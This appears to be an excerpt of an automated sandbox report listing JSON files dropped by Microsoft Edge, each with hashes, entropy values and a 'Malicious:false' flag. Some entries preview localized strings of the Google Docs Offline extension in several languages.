                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.595196082412897
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:48:Y943BFU1LQ4HwQLQ4LQhlmVQL3QUm6H6ZgFIcwn6Rs2ShpQ3IwjGLQSJ/PYoEQj8:I43BCymz8XNcfuQDXYN2sum
                                                                                                                                                                                                                                                                                                                  MD5:83E7A14B7FC60D4C66BF313C8A2BEF0B
                                                                                                                                                                                                                                                                                                                  SHA1:1CCF1D79CDED5D65439266DB58480089CC110B18
                                                                                                                                                                                                                                                                                                                  SHA-256:613D8751F6CC9D3FA319F4B7EA8B2BD3BED37FD077482CA825929DD7C12A69A8
                                                                                                                                                                                                                                                                                                                  SHA-512:3742E24FFC4B5283E6EE496813C1BDC6835630D006E8647D427C3DE8B8E7BF814201ADF9A27BFAB3ABD130B6FEC64EBB102AC0EB8DEDFE7B63D82D3E1233305D
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1719
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.287702203591075
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:48:65/5EKaDMw6pEf4I5+jSksOTJqQyrFO8C:65/5EKaAw6pEf4I5+vsOVqQyFO8C
                                                                                                                                                                                                                                                                                                                  MD5:3B98C4ED8874A160C3789FEAD5553CFA
                                                                                                                                                                                                                                                                                                                  SHA1:5550D0EC548335293D962AAA96B6443DD8ABB9F6
                                                                                                                                                                                                                                                                                                                  SHA-256:ADEB082A9C754DFD5A9D47340A3DDCC19BF9C7EFA6E629A2F1796305F1C9A66F
                                                                                                                                                                                                                                                                                                                  SHA-512:5139B6C6DF9459C7B5CDC08A98348891499408CD75B46519BA3AC29E99AAAFCC5911A1DEE6C3A57E3413DBD0FAE72D7CBC676027248DCE6364377982B5CE4151
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):936
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.457879437756106
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HARXIqhmemNKsE27rhdfNLChtyo2JJ/YgTgin:iIqFC7lrDfNLCIBRzn
                                                                                                                                                                                                                                                                                                                  MD5:7D273824B1E22426C033FF5D8D7162B7
                                                                                                                                                                                                                                                                                                                  SHA1:EADBE9DBE5519BD60458B3551BDFC36A10049DD1
                                                                                                                                                                                                                                                                                                                  SHA-256:2824CF97513DC3ECC261F378BFD595AE95A5997E9D1C63F5731A58B1F8CD54F9
                                                                                                                                                                                                                                                                                                                  SHA-512:E5B611BBFAB24C9924D1D5E1774925433C65C322769E1F3B116254B1E9C69B6DF1BE7828141EEBBF7524DD179875D40C1D8F29C4FB86D663B8A365C6C60421A7
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "BUAT BAHARU".. },.. "explanationofflinedisabled": {.. "message": "Anda berada di luar talian. Untuk menggunakan Google Docs tanpa sambungan Internet, pergi ke tetapan di halaman utama Google Docs dan hidupkan penyegerakan luar talian apabila anda disambungkan ke Internet selepas ini.".. },.. "explanationofflineenabled": {.. "message": "Anda berada di luar talian, tetapi anda masih boleh mengedit fail yang tersedia atau buat fail baharu.".. },.. "extdesc": {.. "message": "Edit, buat dan lihat dokumen, hamparan dan pembentangan anda . kesemuanya tanpa akses Internet.".. },.. "extname": {.. "message": "Google Docs Luar Talian".. },.. "learnmore": {.. "message": "Ketahui Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit dan bekerjasama di mana-mana sahaja anda berada, dengan atau tanpa sambungan Internet.".. }..}..
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):3830
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.5483353063347587
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:48:Ya+Ivxy6ur1+j3P7Xgr5ELkpeCgygyOxONHO3pj6H57ODyOXOVp6:8Uspsj3P3ty2a66xl09
                                                                                                                                                                                                                                                                                                                  MD5:342335A22F1886B8BC92008597326B24
                                                                                                                                                                                                                                                                                                                  SHA1:2CB04F892E430DCD7705C02BF0A8619354515513
                                                                                                                                                                                                                                                                                                                  SHA-256:243BEFBD6B67A21433DCC97DC1A728896D3A070DC20055EB04D644E1BB955FE7
                                                                                                                                                                                                                                                                                                                  SHA-512:CD344D060E30242E5A4705547E807CE3CE2231EE983BB9A8AD22B3E7598A7EC87399094B04A80245AD51D039370F09D74FE54C0B0738583884A73F0C7E888AD8
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1898
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.187050294267571
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAmQ6ZSWfAx6fLMr48tE/cAbJtUZJScSIQoAfboFMiQ9pdvz48YgqG:TQ6W6MbkcAltUJxQdfbqQ9pp0gqG
                                                                                                                                                                                                                                                                                                                  MD5:B1083DA5EC718D1F2F093BD3D1FB4F37
                                                                                                                                                                                                                                                                                                                  SHA1:74B6F050D918448396642765DEF1AD5390AB5282
                                                                                                                                                                                                                                                                                                                  SHA-256:E6ED0A023EF31705CCCBAF1E07F2B4B2279059296B5CA973D2070417BA16F790
                                                                                                                                                                                                                                                                                                                  SHA-512:7102B90ABBE2C811E8EE2F1886A73B1298D4F3D5D05F0FFDB57CF78B9A49A25023A290B255BAA4895BB150B388BAFD9F8432650B8C70A1A9A75083FFFCD74F1A
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):914
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.513485418448461
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvgFARCBxNBv52/fXjOXl6W6ICBxeBvMzU1CSUJAO6SFAIVIbCBhZHdb1tvz+:1HABJx4X6QDwEzlm2uGvYzKU
                                                                                                                                                                                                                                                                                                                  MD5:32DF72F14BE59A9BC9777113A8B21DE6
                                                                                                                                                                                                                                                                                                                  SHA1:2A8D9B9A998453144307DD0B700A76E783062AD0
                                                                                                                                                                                                                                                                                                                  SHA-256:F3FE1FFCB182183B76E1B46C4463168C746A38E461FD25CA91FF2A40846F1D61
                                                                                                                                                                                                                                                                                                                  SHA-512:E0966F5CCA5A8A6D91C58D716E662E892D1C3441DAA5D632E5E843839BB989F620D8AC33ED3EDBAFE18D7306B40CD0C4639E5A4E04DA2C598331DACEC2112AAD
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "NIEUW MAKEN".. },.. "explanationofflinedisabled": {.. "message": "Je bent offline. Wil je Google Documenten zonder internetverbinding gebruiken, ga dan de volgende keer dat je verbinding met internet hebt naar 'Instellingen' op de homepage van Google Documenten en zet 'Offline synchronisatie' aan.".. },.. "explanationofflineenabled": {.. "message": "Je bent offline, maar je kunt nog wel beschikbare bestanden bewerken of nieuwe bestanden maken.".. },.. "extdesc": {.. "message": "Bewerk, maak en bekijk je documenten, spreadsheets en presentaties. Allemaal zonder internettoegang.".. },.. "extname": {.. "message": "Offline Documenten".. },.. "learnmore": {.. "message": "Meer informatie".. },.. "popuphelptext": {.. "message": "Overal schrijven, bewerken en samenwerken, met of zonder internetverbinding.".. }..}..
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):878
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.4541485835627475
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAqwwrJ6wky68uk+NILxRGJwBvDyrj9V:nwwQwky6W+NwswVyT
                                                                                                                                                                                                                                                                                                                  MD5:A1744B0F53CCF889955B95108367F9C8
                                                                                                                                                                                                                                                                                                                  SHA1:6A5A6771DFF13DCB4FD425ED839BA100B7123DE0
                                                                                                                                                                                                                                                                                                                  SHA-256:21CEFF02B45A4BFD60D144879DFA9F427949A027DD49A3EB0E9E345BD0B7C9A8
                                                                                                                                                                                                                                                                                                                  SHA-512:F55E43F14514EECB89F6727A0D3C234149609020A516B193542B5964D2536D192F40CC12D377E70C683C269A1BDCDE1C6A0E634AA84A164775CFFE776536A961
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "OPPRETT NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du er uten nett. For . bruke Google Dokumenter uten internettilkobling, g. til innstillingene p. Google Dokumenter-nettsiden og sl. p. synkronisering uten nett neste gang du er koblet til Internett.".. },.. "explanationofflineenabled": {.. "message": "Du er uten nett, men du kan likevel endre tilgjengelige filer eller opprette nye.".. },.. "extdesc": {.. "message": "Rediger, opprett og se dokumentene, regnearkene og presentasjonene dine . uten nettilgang.".. },.. "extname": {.. "message": "Google Dokumenter uten nett".. },.. "learnmore": {.. "message": "Finn ut mer".. },.. "popuphelptext": {.. "message": "Skriv, rediger eller samarbeid uansett hvor du er, med eller uten internettilkobling.".. }..}..
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):2766
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.839730779948262
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:48:YEH6/o0iZbNCbDMUcipdkNtQjsGKIhO9aBjj/nxt9o5nDAj3:p6wbZbEbvJ8jQkIhO9aBjb/90Ab
                                                                                                                                                                                                                                                                                                                  MD5:97F769F51B83D35C260D1F8CFD7990AF
                                                                                                                                                                                                                                                                                                                  SHA1:0D59A76564B0AEE31D0A074305905472F740CECA
                                                                                                                                                                                                                                                                                                                  SHA-256:BBD37D41B7DE6F93948FA2437A7699D4C30A3C39E736179702F212CB36A3133C
                                                                                                                                                                                                                                                                                                                  SHA-512:D91F5E2D22FC2D7F73C1F1C4AF79DB98FCFD1C7804069AE9B2348CBC729A6D2DFF7FB6F44D152B0BDABA6E0D05DFF54987E8472C081C4D39315CEC2CBC593816
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):978
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.879137540019932
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HApiJiRelvm3wi8QAYcbm24sK+tFJaSDD:FJMx3whxYcbNp
                                                                                                                                                                                                                                                                                                                  MD5:B8D55E4E3B9619784AECA61BA15C9C0F
                                                                                                                                                                                                                                                                                                                  SHA1:B4A9C9885FBEB78635957296FDDD12579FEFA033
                                                                                                                                                                                                                                                                                                                  SHA-256:E00FF20437599A5C184CA0C79546CB6500171A95E5F24B9B5535E89A89D3EC3D
                                                                                                                                                                                                                                                                                                                  SHA-512:266589116EEE223056391C65808255EDAE10EB6DC5C26655D96F8178A41E283B06360AB8E08AC3857D172023C4F616EF073D0BEA770A3B3DD3EE74F5FFB2296B
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "UTW.RZ NOWY".. },.. "explanationofflinedisabled": {.. "message": "Jeste. offline. Aby korzysta. z Dokument.w Google bez po..czenia internetowego, otw.rz ustawienia na stronie g..wnej Dokument.w Google i w..cz synchronizacj. offline nast.pnym razem, gdy b.dziesz mie. dost.p do internetu.".. },.. "explanationofflineenabled": {.. "message": "Jeste. offline, ale nadal mo.esz edytowa. dost.pne pliki i tworzy. nowe.".. },.. "extdesc": {.. "message": "Edytuj, tw.rz i wy.wietlaj swoje dokumenty, arkusze kalkulacyjne oraz prezentacje bez konieczno.ci ..czenia si. z internetem.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Wi.cej informacji".. },.. "popuphelptext": {.. "message": "Pisz, edytuj i wsp..pracuj, gdziekolwiek jeste. . niezale.nie od tego, czy masz po..czenie z internetem.".. }..}..
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):907
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.599411354657937
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvgU30CBxNd6GwXOK1styCJ02OK9+4KbCBxed6X4LBAt4rXgUCSUuYDHIIQka:1HAcXlyCJ5+Tsz4LY4rXSw/Q+ftkC
                                                                                                                                                                                                                                                                                                                  MD5:608551F7026E6BA8C0CF85D9AC11F8E3
                                                                                                                                                                                                                                                                                                                  SHA1:87B017B2D4DA17E322AF6384F82B57B807628617
                                                                                                                                                                                                                                                                                                                  SHA-256:A73EEA087164620FA2260D3910D3FBE302ED85F454EDB1493A4F287D42FC882F
                                                                                                                                                                                                                                                                                                                  SHA-512:82F52F8591DB3C0469CC16D7CBFDBF9116F6D5B5D2AD02A3D8FA39CE1378C64C0EA80AB8509519027F71A89EB8BBF38A8702D9AD26C8E6E0F499BF7DA18BF747
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Voc. est. off-line. Para usar o Documentos Google sem conex.o com a Internet, na pr.xima vez que se conectar, acesse as configura..es na p.gina inicial do Documentos Google e ative a sincroniza..o off-line.".. },.. "explanationofflineenabled": {.. "message": "Voc. est. off-line, mas mesmo assim pode editar os arquivos dispon.veis ou criar novos arquivos.".. },.. "extdesc": {.. "message": "Edite, crie e veja seus documentos, planilhas e apresenta..es sem precisar de acesso . Internet.".. },.. "extname": {.. "message": "Documentos Google off-line".. },.. "learnmore": {.. "message": "Saiba mais".. },.. "popuphelptext": {.. "message": "Escreva, edite e colabore onde voc. estiver, com ou sem conex.o com a Internet.".. }..}..
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):914
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.604761241355716
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAcXzw8M+N0STDIjxX+qxCjKw5BKriEQFMJXkETs:zXzw0pKXbxqKw5BKri3aNY
                                                                                                                                                                                                                                                                                                                  MD5:0963F2F3641A62A78B02825F6FA3941C
                                                                                                                                                                                                                                                                                                                  SHA1:7E6972BEAB3D18E49857079A24FB9336BC4D2D48
                                                                                                                                                                                                                                                                                                                  SHA-256:E93B8E7FB86D2F7DFAE57416BB1FB6EE0EEA25629B972A5922940F0023C85F90
                                                                                                                                                                                                                                                                                                                  SHA-512:22DD42D967124DA5A2209DD05FB6AD3F5D0D2687EA956A22BA1E31C56EC09DEB53F0711CD5B24D672405358502E9D1C502659BB36CED66CAF83923B021CA0286
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est. offline. Para utilizar o Google Docs sem uma liga..o . Internet, aceda .s defini..es na p.gina inicial do Google Docs e ative a sincroniza..o offline da pr.xima vez que estiver ligado . Internet.".. },.. "explanationofflineenabled": {.. "message": "Est. offline, mas continua a poder editar os ficheiros dispon.veis ou criar novos ficheiros.".. },.. "extdesc": {.. "message": "Edite, crie e veja os documentos, as folhas de c.lculo e as apresenta..es, tudo sem precisar de aceder . Internet.".. },.. "extname": {.. "message": "Google Docs offline".. },.. "learnmore": {.. "message": "Saber mais".. },.. "popuphelptext": {.. "message": "Escreva edite e colabore onde quer que esteja, com ou sem uma liga..o . Internet.".. }..}..
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):937
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.686555713975264
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HA8dC6e6w+uFPHf2TFMMlecFpweWV4RE:pC6KvHf4plVweCx
                                                                                                                                                                                                                                                                                                                  MD5:BED8332AB788098D276B448EC2B33351
                                                                                                                                                                                                                                                                                                                  SHA1:6084124A2B32F386967DA980CBE79DD86742859E
                                                                                                                                                                                                                                                                                                                  SHA-256:085787999D78FADFF9600C9DC5E3FF4FB4EB9BE06D6BB19DF2EEF8C284BE7B20
                                                                                                                                                                                                                                                                                                                  SHA-512:22596584D10707CC1C8179ED3ABE46EF2C314CF9C3D0685921475944B8855AAB660590F8FA1CFDCE7976B4BB3BD9ABBBF053F61F1249A325FD0094E1C95692ED
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CREEAZ. UN DOCUMENT".. },.. "explanationofflinedisabled": {.. "message": "E.ti offline. Pentru a utiliza Documente Google f.r. conexiune la internet, intr. .n set.rile din pagina principal. Documente Google .i activeaz. sincronizarea offline data viitoare c.nd e.ti conectat(.) la internet.".. },.. "explanationofflineenabled": {.. "message": "E.ti offline, dar po.i .nc. s. editezi fi.ierele disponibile sau s. creezi altele.".. },.. "extdesc": {.. "message": "Editeaz., creeaz. .i acceseaz. documente, foi de calcul .i prezent.ri - totul f.r. acces la internet.".. },.. "extname": {.. "message": "Documente Google Offline".. },.. "learnmore": {.. "message": "Afl. mai multe".. },.. "popuphelptext": {.. "message": "Scrie, editeaz. .i colaboreaz. oriunde ai fi, cu sau f.r. conexiune la internet.".. }..}..
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1337
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.69531415794894
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HABEapHTEmxUomjsfDVs8THjqBK8/hHUg41v+Lph5eFTHQ:I/VdxUomjsre8Kh4Riph5eFU
                                                                                                                                                                                                                                                                                                                  MD5:51D34FE303D0C90EE409A2397FCA437D
                                                                                                                                                                                                                                                                                                                  SHA1:B4B9A7B19C62D0AA95D1F10640A5FBA628CCCA12
                                                                                                                                                                                                                                                                                                                  SHA-256:BE733625ACD03158103D62BC0EEF272CA3F265AC30C87A6A03467481A177DAE3
                                                                                                                                                                                                                                                                                                                  SHA-512:E8670DED44DC6EE30E5F41C8B2040CF8A463CD9A60FC31FA70EB1D4C9AC1A3558369792B5B86FA761A21F5266D5A35E5C2C39297F367DAA84159585C19EC492A
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):2846
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.7416822879702547
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:48:YWi+htQTKEQb3aXQYJLSWy7sTQThQTnQtQTrEmQ6kiLsegQSJFwsQGaiPn779I+S:zhiTK5b3tUGVjTGTnQiTryOLpyaxYf/S
                                                                                                                                                                                                                                                                                                                  MD5:B8A4FD612534A171A9A03C1984BB4BDD
                                                                                                                                                                                                                                                                                                                  SHA1:F513F7300827FE352E8ECB5BD4BB1729F3A0E22A
                                                                                                                                                                                                                                                                                                                  SHA-256:54241EBE651A8344235CC47AFD274C080ABAEBC8C3A25AFB95D8373B6A5670A2
                                                                                                                                                                                                                                                                                                                  SHA-512:C03E35BFDE546AEB3245024EF721E7E606327581EFE9EAF8C5B11989D9033BDB58437041A5CB6D567BAA05466B6AAF054C47F976FD940EEEDF69FDF80D79095B
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):934
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.882122893545996
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAF8pMv1RS4LXL22IUjdh8uJwpPqLDEtxKLhSS:hyv1RS4LXx38u36QsS
                                                                                                                                                                                                                                                                                                                  MD5:8E55817BF7A87052F11FE554A61C52D5
                                                                                                                                                                                                                                                                                                                  SHA1:9ABDC0725FE27967F6F6BE0DF5D6C46E2957F455
                                                                                                                                                                                                                                                                                                                  SHA-256:903060EC9E76040B46DEB47BBB041D0B28A6816CB9B892D7342FC7DC6782F87C
                                                                                                                                                                                                                                                                                                                  SHA-512:EFF9EC7E72B272DDE5F29123653BC056A4BC2C3C662AE3C448F8CB6A4D1865A0679B7E74C1B3189F3E262109ED6BC8F8D2BDE14AEFC8E87E0F785AE4837D01C7
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "VYTVORI. NOV.".. },.. "explanationofflinedisabled": {.. "message": "Ste offline. Ak chcete pou.i. Dokumenty Google bez pripojenia na internet, po najbli..om pripojen. na internet prejdite do nastaven. na domovskej str.nke Dokumentov Google a.zapnite offline synchroniz.ciu.".. },.. "explanationofflineenabled": {.. "message": "Ste offline, no st.le m..ete upravova. dostupn. s.bory a.vytv.ra. nov..".. },.. "extdesc": {.. "message": ".prava, tvorba a.zobrazenie dokumentov, tabuliek a.prezent.ci.. To v.etko bez pr.stupu na internet.".. },.. "extname": {.. "message": "Dokumenty Google v re.ime offline".. },.. "learnmore": {.. "message": ".al.ie inform.cie".. },.. "popuphelptext": {.. "message": "P..te, upravujte a.spolupracuje, kdeko.vek ste, a.to s.pripojen.m na internet aj bez neho.".. }..}..
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):963
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.6041913416245
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvgfECBxNFCEuKXowwJrpvPwNgEcPJJJEfWOCBxeFCJuGuU4KYXCSUXKDxX4A:1HAXMKYw8VYNLcaeDmKYLdX2zJBG5
                                                                                                                                                                                                                                                                                                                  MD5:BFAEFEFF32813DF91C56B71B79EC2AF4
                                                                                                                                                                                                                                                                                                                  SHA1:F8EDA2B632610972B581724D6B2F9782AC37377B
                                                                                                                                                                                                                                                                                                                  SHA-256:AAB9CF9098294A46DC0F2FA468AFFF7CA7C323A1A0EFA70C9DB1E3A4DA05D1D4
                                                                                                                                                                                                                                                                                                                  SHA-512:971F2BBF5E9C84DE3D31E5F2A4D1A00D891A2504F8AF6D3F75FC19056BFD059A270C4C9836AF35258ABA586A1888133FB22B484F260C1CBC2D1D17BC3B4451AA
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "USTVARI NOVO".. },.. "explanationofflinedisabled": {.. "message": "Nimate vzpostavljene povezave. .e .elite uporabljati Google Dokumente brez internetne povezave, odprite nastavitve na doma.i strani Google Dokumentov in vklopite sinhronizacijo brez povezave, ko naslednji. vzpostavite internetno povezavo.".. },.. "explanationofflineenabled": {.. "message": "Nimate vzpostavljene povezave, vendar lahko .e vedno urejate razpolo.ljive datoteke ali ustvarjate nove.".. },.. "extdesc": {.. "message": "Urejajte, ustvarjajte in si ogledujte dokumente, preglednice in predstavitve . vse to brez internetnega dostopa.".. },.. "extname": {.. "message": "Google Dokumenti brez povezave".. },.. "learnmore": {.. "message": "Ve. o tem".. },.. "popuphelptext": {.. "message": "Pi.ite, urejajte in sodelujte, kjer koli ste, z internetno povezavo ali brez nje.".. }..}..
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1320
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.569671329405572
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HArg/fjQg2JwrfZtUWTrw1P4epMnRGi5TBmuPDRxZQ/XtiCw/Rwh/Q9EVz:ogUg2JwDZe6rwKI8VTP9xK1CwhI94
                                                                                                                                                                                                                                                                                                                  MD5:7F5F8933D2D078618496C67526A2B066
                                                                                                                                                                                                                                                                                                                  SHA1:B7050E3EFA4D39548577CF47CB119FA0E246B7A4
                                                                                                                                                                                                                                                                                                                  SHA-256:4E8B69E864F57CDDD4DC4E4FAF2C28D496874D06016BC22E8D39E0CB69552769
                                                                                                                                                                                                                                                                                                                  SHA-512:0FBAB56629368EEF87DEEF2977CA51831BEB7DEAE98E02504E564218425C751853C4FDEAA40F51ECFE75C633128B56AE105A6EB308FD5B4A2E983013197F5DBA
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):884
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.627108704340797
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HA0NOYT/6McbnX/yzklyOIPRQrJlvDymvBd:vNOcyHnX/yg0P4Bymn
                                                                                                                                                                                                                                                                                                                  MD5:90D8FB448CE9C0B9BA3D07FB8DE6D7EE
                                                                                                                                                                                                                                                                                                                  SHA1:D8688CAC0245FD7B886D0DEB51394F5DF8AE7E84
                                                                                                                                                                                                                                                                                                                  SHA-256:64B1E422B346AB77C5D1C77142685B3FF7661D498767D104B0C24CB36D0EB859
                                                                                                                                                                                                                                                                                                                  SHA-512:6D58F49EE3EF0D3186EA036B868B2203FE936CE30DC8E246C32E90B58D9B18C624825419346B62AF8F7D61767DBE9721957280AA3C524D3A5DFB1A3A76C00742
                                                                                                                                                                                                                                                                                                                  Malicious:false
